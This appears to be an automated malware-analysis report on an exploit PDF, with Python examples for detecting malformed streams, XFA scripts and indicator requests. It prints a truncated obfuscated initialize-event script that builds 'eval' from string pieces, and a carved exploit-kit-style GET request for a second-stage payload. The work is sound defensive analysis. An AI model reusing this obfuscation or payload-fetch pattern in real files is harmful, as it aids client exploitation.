Verdict: MALICIOUS (risk score 78)

Malware Insights

MITRE ATT&CK
- T1203 Exploitation for Client Execution
- T1059.007 Command and Scripting Interpreter: JavaScript
The PDF contains malformed streams, five embedded files and an XFA form whose ImageField1 initialize event carries obfuscated JavaScript, which together indicate an exploit document rather than a benign form. The carved content also holds an HTTP GET request with Referer http://www.aviationweather.mn/ and an x-flash-version header, consistent with the JavaScript retrieving a second-stage payload through that site. The ML classifier scores the PDF as malicious with maximum confidence, supporting exploitation of a client-execution vulnerability (T1203).
Machine Learning
- Nyx PDF Classifier malicious score 1.0000
Heuristics (6)

- Malformed active-content stream length (medium) PDF_MALFORMED_EXPLOIT_STREAM_LENGTH: A PDF stream that carries active/exploit-looking content has a declared /Length that does not match the recovered stream body. Malformed stream boundaries and length mismatches are common parser-evasion tricks and supporting evidence around Reader exploit streams. The raw object headers in the preview below show at least one such mismatch: object 45 declares /Length 1919 for a body that is the 77-byte localeSet element.
- Embedded file (low) PDF_EMBEDDED: The PDF embeds file attachments, which can carry an executable or another weaponised document as a nested payload. Five /Type/EmbeddedFile objects were carved (see Extracted artifacts).
- XFA form (low) PDF_XFA: The PDF uses XML Forms Architecture, which can contain script logic. Here the template's ImageField1 has an initialize-event script (shown in the preview below).
- AcroForm button with action trigger (low) PDF_ACROFORM_BUTTON: The PDF contains a /Btn form field together with a SubmitForm/URI/Launch/JS trigger. This is the building block of the fake "Download" or "Open" button overlays used in PDF phishing lures.
- PDF differential parser failed (info) PDF_DIFFERENTIAL_PARSE_FAILED: The cross-check parser (pdfminer.six) failed on this file with PDFSyntaxError. The static heuristics still ran and their findings above remain valid; only the differential cross-check signal is missing.
- Embedded URL (info) EMBEDDED_URL: One or more URLs were extracted from the document. A URL by itself is not a detection; the per-URL label says which channel (macro, JS, link annotation, document body, ...) reached it.
  - http://www.aviationweather.mn/ (in PDF document text; also the Referer of the HTTP request carved in the preview)
  - http://www.aviationweather.mn/x-flash-version (in PDF document text; most likely an extractor artifact, the Referer value run together with the x-flash-version header that follows it in the carved request, not a real path)
  - http://www.xfa.org/schema/xfa-locale-set/2.1/ (in PDF document text)
  - http://ns.adobe.com/xdp/ (in PDF document text)
  - http://www.xfa.org/schema/xci/1.0/ (in PDF document text)
  - http://www.xfa.org/schema/xfa-template/2.2/ (in PDF document text)
  - http://www.xfa.org/schema/xfa-data/1.0/ (in PDF document text)
  The last five are XFA/XDP schema namespace identifiers, not network indicators.
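As an added example (not the analyzer's own code), the three structural checks above can be reproduced with a short Python scan over a constructed PDF fragment: a direct /Length that disagrees with the stream body, /EmbeddedFile and /XFA markers, a script inside an inflated XDP packet, and a /Btn field wired to a URI action. The object numbers, the button and the XDP packet are made up for the demo; object 45 copies the header-and-body shape visible in the raw object dump further down this page. A production parser has to resolve indirect /Length references and object streams, which this regex-based pass deliberately skips, and it uses decompressobj so that a truncated FlateDecode body still yields whatever can be inflated.

```python
import re
import zlib

# Constructed XDP packet with a script element, compressed as a PDF stream would be.
XDP_PACKET = (
    b'<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/"><template>'
    b"<xfa:script contentType='application/x-javascript'>app.alert(1)</xfa:script>"
    b"</template></xdp:xdp>"
)
XDP_DEFLATED = zlib.compress(XDP_PACKET)

HEAD = (
    b"%PDF-1.6\n"
    b"1 0 obj<</Type/Catalog/AcroForm 2 0 R>>endobj\n"
    b"2 0 obj<</Fields[3 0 R]/XFA 5 0 R>>endobj\n"
    b"3 0 obj<</FT/Btn/T(Download)/A<</S/URI/URI(http://example.invalid/get)>>>>endobj\n"
)
TAIL = (
    # object 45 mirrors the header/body shape in this report's object dump
    b"45 0 obj<</Length 1919/Type/EmbeddedFile>>stream\n"
    b'<localeSet xmlns="http://www.xfa.org/schema/xfa-locale-set/2.1/"></localeSet>\n'
    b"endstream\nendobj\n"
    b"trailer<</Root 1 0 R>>\n%%EOF\n"
)
SAMPLE_PDF = (
    HEAD
    + b"5 0 obj<</Length " + str(len(XDP_DEFLATED)).encode()
    + b"/Filter/FlateDecode>>stream\n" + XDP_DEFLATED + b"\nendstream\nendobj\n"
    + TAIL
)

OBJ_RE = re.compile(rb"(\d+)\s+(\d+)\s+obj\b(.*?)\bendobj", re.DOTALL)
STREAM_RE = re.compile(rb"<<(.*?)>>\s*stream\r?\n(.*?)\r?\nendstream", re.DOTALL)
# direct /Length only; an indirect "/Length 7 0 R" needs xref resolution and is skipped
LENGTH_RE = re.compile(rb"/Length\s+(\d+)\b(?!\s+\d+\s+R)")
ACTION_RE = re.compile(rb"/S\s*/(URI|JavaScript|Launch|SubmitForm)\b")
EOL_SLACK = 2  # an EOL before endstream is legal and not part of the data


def inflate(body: bytes) -> bytes:
    """Inflate a FlateDecode body; partial output for a truncated stream,
    b"" for data that is not zlib at all, never an exception."""
    try:
        return zlib.decompressobj().decompress(body)
    except zlib.error:
        return b""


def scan_pdf(data: bytes) -> list[dict]:
    findings = []
    for m in OBJ_RE.finditer(data):
        num, obj = int(m.group(1)), m.group(3)
        sm = STREAM_RE.search(obj)
        # look for name keys in the dictionary only, never in compressed bytes
        d = sm.group(1) if sm else obj
        if b"/XFA" in d:
            findings.append({"obj": num, "rule": "XFA_FORM"})
        if b"/JS" in d or b"/JavaScript" in d:
            findings.append({"obj": num, "rule": "JAVASCRIPT_ACTION"})
        am = ACTION_RE.search(d)
        if re.search(rb"/FT\s*/Btn\b", d) and am:
            findings.append({"obj": num, "rule": "BUTTON_WITH_ACTION",
                             "action": am.group(1).decode()})
        if not sm:
            continue
        header, body = sm.group(1), sm.group(2)
        if b"/EmbeddedFile" in header:
            findings.append({"obj": num, "rule": "EMBEDDED_FILE"})
        lm = LENGTH_RE.search(header)
        if lm and abs(int(lm.group(1)) - len(body)) > EOL_SLACK:
            findings.append({"obj": num, "rule": "STREAM_LENGTH_MISMATCH",
                             "declared": int(lm.group(1)), "actual": len(body)})
        content = inflate(body) if b"/FlateDecode" in header else body
        if b"<xfa:script" in content or b"application/x-javascript" in content:
            findings.append({"obj": num, "rule": "XFA_SCRIPT"})
    return findings


if __name__ == "__main__":
    for f in scan_pdf(SAMPLE_PDF):
        print(f)
```

On the constructed input the scan reports XFA_FORM on object 2, BUTTON_WITH_ACTION (URI) on object 3, XFA_SCRIPT on object 5 after inflation, and EMBEDDED_FILE plus STREAM_LENGTH_MISMATCH (1919 declared, 77 actual) on object 45.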
Extracted artifacts (6)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| embedded_file_obj0041.bin | pdf-embedded-file | PDF EmbeddedFile object 41 at offset 0x11B4 | 85 bytes | c06dcd026a7ea0536b63e07ce688691b585339a3ab7ff59065e546b56308c7bb |
| embedded_file_obj0042.bin | pdf-embedded-file | PDF EmbeddedFile object 42 at offset 0x1266 | 1029 bytes | dda0835df994b8be920f715db36452f6cee7bb42bbc9c897f878a7b298ba8e91 |
| embedded_file_obj0063.bin | pdf-embedded-file | PDF EmbeddedFile object 63 at offset 0x147F | 1079 bytes | 8919e0fd4dd4b1dfb910aa2ef1b5ceb2f9c6e259ea7d1e25f1659ea483e94d4a |
| embedded_file_obj0044.bin | pdf-embedded-file | PDF EmbeddedFile object 44 at offset 0x253D | 144 bytes | 3dd68f00f4fcb366a2a3a17c65cb2626eeddf5ea5713302d374310561d810169 |
| embedded_file_obj0045.bin | pdf-embedded-file | PDF EmbeddedFile object 45 at offset 0x25EA | 77 bytes | 10c03f88a5f0a0833dc5b2c8ac295b3a3c6f65e23889eb8cc1dc6fe29bf7f275 |
| deobfuscated.js | deobfuscated-js | PDF JavaScript deobfuscation pass | 13628 bytes | 6f9b79af928df918485e46df92e8e2a9383950e963bbd408f00f87fb776d5b59 |
Preview: deobfuscated.js (first 1,000 lines of the extracted script)

The carve is not a single script but a concatenation of decoded PDF streams; the parts that matter for the verdict are the XDP packet with the XFA initialize-event script and the embedded HTTP request further down. The preview opens with non-script content, summarised here rather than reproduced:

- a small content stream that paints a 9x9 white square with a black X through it;
- a ToUnicode CMap mapping single-byte codes <00> to <FF> onto Unicode (controls to U+FFFD, <20> to <7E> to ASCII, <7F> to <9F> to the usual typographic characters, <AD> to a hyphen), garbled from roughly <D4> onward;
- a content stream that fills an 81x279-point rectangle at (288, 441) with pattern /P0, strokes dotted and dashed edges round it and shows the glyph codes <002A><004E><0042><0048><0046><0001> in font /C0_0. That is the rendering of the 28.575mm x 98.425mm ImageField1 with crossDiagonal fill and dotted/dashed borders declared in the XFA template below, and the codes are consistent with its "Image Field" caption;
- undecodable bytes up to the start of the XDP packet.
The XDP packet, pretty-printed from the single-line form in the carve. The script inside the initialize event is reproduced exactly as carved; it breaks off mid-statement, and the closing tags of xfa:script, event, field, subform and template are not recovered before the datasets packet resumes.

```xml
<?xml version="1.0" encoding="UTF-8"?>
<xdp:xdp xmlns:xdp="http://ns.adobe.com/xdp/">
<config xmlns="http://www.xfa.org/schema/xci/1.0/" xmlns:xfa="http://www.xfa.org/schema/xci/1.0/">
  <trace><area level="1" name="font"></area></trace>
  <agent name="designer"><!-- [0..n] --><destination>pdf</destination><pdf><!-- [0..n] --><fontInfo></fontInfo></pdf></agent>
  <present><!-- [0..n] -->
    <pdf><!-- [0..n] --><fontInfo><embed>1</embed></fontInfo><version>1.6</version><creator>Adobe Designer 7.0</creator><producer>Adobe Designer 7.0</producer><scriptModel>XFA</scriptModel><interactive>1</interactive><tagged>1</tagged><compression><level>6</level><compressLogicalStructure>1</compressLogicalStructure></compression></pdf>
    <xdp><packets>*</packets></xdp>
    <destination>pdf</destination>
  </present>
  <acrobat>
    <acrobat7><dynamicRender>forbidden</dynamicRender></acrobat7>
    <common><locale></locale><data><incrementalLoad></incrementalLoad><adjustData></adjustData><xsl><uri></uri></xsl><outputXSL><uri></uri></outputXSL></data><template><base>C:\</base><relevant></relevant><uri></uri></template></common>
  </acrobat>
</config>
<template>
  <subform layout="tb" locale="ru_RU" name="form1">
    <pageSet><pageArea><contentArea h="10.5in" w="8in" x="0.25in" y="0.25in"></contentArea><medium long="11in" short="8.5in" stock="letter"></medium></pageArea></pageSet>
    <subform h="10.5in" w="8in">
      <field h="98.425mm" name="ImageField1" w="28.575mm" x="95.25mm" y="19.05mm">
        <ui><imageEdit></imageEdit></ui>
        <caption placement="bottom" reserve="5mm"><font typeface="Myriad Pro"></font><para vAlign="middle"></para><value><text>Image Field</text></value></caption>
        <border xmlns=""><edge presence="hidden"></edge><edge stroke="dotted"></edge><edge stroke="dotted"></edge><edge stroke="dashed"></edge><corner stroke="dotted"></corner><corner stroke="dotted"></corner><corner stroke="dashed"></corner><fill><pattern type="crossDiagonal"></pattern></fill></border>
        <event xmlns:xfa="http://www.xfa.org/schema/xfa-template/2.2/" activity="initialize">
          <xfa:script contentType='application/x-javascript'>
vcx='Init';
with(event){
cxz='ev';
cxz+='a';
l="l";
t=target;
cxz+=l;
cr4='rep';
cr4+='lace';
if(event.name===vcx){
==v';
)></e8
<!-- script body and closing tags truncated in the carve; not recovered -->
<xfa:datasets xmlns:xfa="http://www.xfa.org/schema/xfa-data/1.0/"><xfa:data><form1><ImageField1></ImageField1></form1></xfa:data></xfa:datasets>
</xdp:xdp>
```
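The script fragment above builds its API names from pieces: cxz becomes 'ev'+'a'+'l' and cr4 becomes 'rep'+'lace', so the tokens eval and replace never appear in the file for a keyword scan to find, and with(event){...} puts the event object's properties in scope. As an added example (not the analyzer's deobfuscation pass), the following Python folds that idiom statically and substitutes the results back, which is what turns event.name===vcx into event.name==='Init'. It runs on the carved text exactly as shown; because the carve ends mid-statement, what eval and replace were eventually applied to is not recoverable here and the code does not guess.

```python
import re

# The initialize-event script as carved from this sample, up to the truncation.
SCRIPT = """\
vcx='Init';
with(event){
cxz='ev';
cxz+='a';
l="l";
t=target;
cxz+=l;
cr4='rep';
cr4+='lace';
if(event.name===vcx){
"""

# matches   name = 'lit';   name += "lit";   name += othername;
ASSIGN_RE = re.compile(
    r"""^\s*([A-Za-z_$][\w$]*)\s*(\+?=)\s*(?:'([^']*)'|"([^"]*)"|([A-Za-z_$][\w$]*))\s*;\s*$"""
)
# resolved values worth a second look in Acrobat JavaScript
SENSITIVE = {"eval", "replace", "unescape", "fromCharCode", "getAnnots", "printf"}


def fold_strings(script: str) -> dict[str, str]:
    """Evaluate, line by line, every assignment whose right-hand side is a
    string literal or an already-folded variable. Anything else (here the
    line t=target) stays unresolved rather than being guessed."""
    env: dict[str, str] = {}
    for line in script.splitlines():
        m = ASSIGN_RE.match(line)
        if not m:
            continue
        name, op, sq, dq, ref = m.groups()
        if ref is not None:
            if ref not in env:
                continue
            value = env[ref]
        else:
            value = sq if sq is not None else dq
        if op == "=":
            env[name] = value
        elif name in env:
            env[name] += value
    return env


def suspicious_names(env: dict[str, str]) -> set[str]:
    return {v for v in env.values() if v in SENSITIVE}


def rewrite(script: str, env: dict[str, str]) -> str:
    """Drop the folded assignments and substitute the resolved literals into
    the remaining lines, giving the script as the engine would see it."""
    if not env:
        return script
    pattern = re.compile(r"\b(" + "|".join(map(re.escape, env)) + r")\b")
    out = []
    for line in script.splitlines():
        m = ASSIGN_RE.match(line)
        if m and m.group(1) in env:
            continue
        out.append(pattern.sub(lambda mm: repr(env[mm.group(1)]), line))
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    env = fold_strings(SCRIPT)
    print(env, suspicious_names(env))
    print(rewrite(SCRIPT, env))
```

The fold resolves vcx to 'Init', cxz to 'eval', l to 'l' and cr4 to 'replace'; the rewritten view keeps only with(event){, t=target; and if(event.name==='Init'){. A real deobfuscator has to handle string methods, array joins and charCode tricks as well, but this one idiom accounts for everything visible in the carve.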
The preview continues with more decoded stream content that is not script: a second ToUnicode CMap for the subset font of the field caption (codes <0001>, <0027>, <002A>, <0042>, <0045>, <0046>, <0048>, <004A> map to space, F, I, a, d, e, g, o, after which the table is garbled), the XDP packet names preamble, config, template, datasets, localeSet and postamble, the field path form1[0].#subform[0].ImageField1[0] with its caption "Image Field", font resource names (Helv, CourierStd, Myriad Pro, Identity) and undecodable bytes. It then runs into the raw PDF objects of the embedded files. Only the object headers and the one unfiltered body are recoverable; the Flate-compressed bodies are omitted here.

```text
41 0 obj<</Length 89/Filter[/FlateDecode]/Type/EmbeddedFile>>stream ... endstream endobj
42 0 obj<</Length 504/Filter[/FlateDecode]/Type/EmbeddedFile>>stream ... endstream endobj
63 0 obj<</Length 1313/Filter/FlateDecode/Type/EmbeddedFile>>stream ... endstream endobj
44 0 obj<</Length 105/Filter[/FlateDecode]/Type/EmbeddedFile>>stream ... endstream endobj
45 0 obj<</Length 1919/Type/EmbeddedFile>>stream
<localeSet xmlns="http://www.xfa.org/schema/xfa-locale-set/2.1/"></localeSet>
endstream
endobj
46 0 obj<</Length 19/Filter[/FlateDecode]/Type/EmbeddedFile>>stream ... (no endstream recovered)
```

Two things stand out in these headers. Object 45 declares /Length 1919 for a 77-byte unfiltered body, and object 46 declares /Length 19 for a FlateDecode body that runs on for far longer; both are the kind of length mismatch the PDF_MALFORMED_EXPLOIT_STREAM_LENGTH heuristic describes. Object 46 is also absent from the carved artifacts listed above, so its content is only visible here. The undecodable bytes after the object 46 header end in a plaintext HTTP request:

```http
GET /iprofy/covered/deemed-hill-believe-trucks.php?xfgh=1h:1k:1i:1f:31&akhtcqmx=30:3e:3a:3i&ngv=33:2v:31:1i:30:1j:1i:1k:1l:2w&aevrouja=myz HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://www.aviationweather.mn/
x-flash-version: 10,0,32,18
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1
```

The User-Agent line is cut off in the carve and no Host header survives, so the request's destination cannot be recovered from this text. The Referer places the request in a browsing session on www.aviationweather.mn, and x-flash-version is the header Flash Player adds to requests it issues itself, so this request was most likely made by a Flash object loaded from that site rather than by a user navigating.
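As an added example (not the analyzer's own code), the carved request can be turned into a structured indicator record instead of being copied around as text. The parser is generic; the indicator checks are this example's own simple heuristics (x-flash-version present, the Referer host, a .php path with several opaque colon-separated parameters, and the old MSIE 6.0 user agent), not the analyzer's rules. CRLF line endings are assumed, and the truncated User-Agent is kept as carved.

```python
import re
from urllib.parse import parse_qs, urlsplit

# The request as it appears in the preview above (User-Agent truncated there).
RAW_REQUEST = (
    "GET /iprofy/covered/deemed-hill-believe-trucks.php"
    "?xfgh=1h:1k:1i:1f:31&akhtcqmx=30:3e:3a:3i"
    "&ngv=33:2v:31:1i:30:1j:1i:1k:1l:2w&aevrouja=myz HTTP/1.1\r\n"
    "Accept: */*\r\n"
    "Accept-Language: en-US\r\n"
    "Referer: http://www.aviationweather.mn/\r\n"
    "x-flash-version: 10,0,32,18\r\n"
    "Accept-Encoding: gzip, deflate\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1\r\n"
)


def parse_request(raw: str) -> dict:
    """Parse an HTTP/1.x request head into method, version, path, query and
    lower-cased headers. Stops at the first blank line (end of headers)."""
    lines = raw.splitlines()
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    parts = urlsplit(target)
    query = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return {"method": method, "version": version, "path": parts.path,
            "query": query, "headers": headers}


def defang(url: str) -> str:
    """Make a URL safe to paste into a report or ticket."""
    return re.sub(r"^http", "hxxp", url).replace(".", "[.]")


def indicators(req: dict) -> list[str]:
    """Example heuristics over the parsed request (this example's own
    assumptions about what is interesting, not the analyzer's rules)."""
    hits = []
    h = req["headers"]
    if "x-flash-version" in h:
        hits.append("flash-plugin-request:" + h["x-flash-version"])
    if "referer" in h:
        hits.append("referer-host:" + (urlsplit(h["referer"]).hostname or ""))
    opaque = all(re.fullmatch(r"[0-9a-z:]+", v) for v in req["query"].values())
    if req["path"].endswith(".php") and len(req["query"]) >= 3 and opaque:
        hits.append("ek-style-query:" + req["path"])
    if "MSIE 6.0" in h.get("user-agent", ""):
        hits.append("legacy-ie-ua")
    return hits


if __name__ == "__main__":
    req = parse_request(RAW_REQUEST)
    print(req["path"], req["query"])
    print(indicators(req))
    print(defang(req["headers"]["referer"]))
```

The record keeps the four query parameters and their values separately, which is what you want when pivoting on the parameter names across other samples, and the defanged Referer is the form to put in the report.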
The rest of the preview is the tail of the same binary dump: printable-string residue (ImageField1[0], form1[0], #subform[0], Adobe, UCS, a run of ASCII punctuation and digits, event, event.name===vcx, the glyph letters of the caption font) and undecodable bytes. Nothing beyond what is already shown above survives, so it is omitted.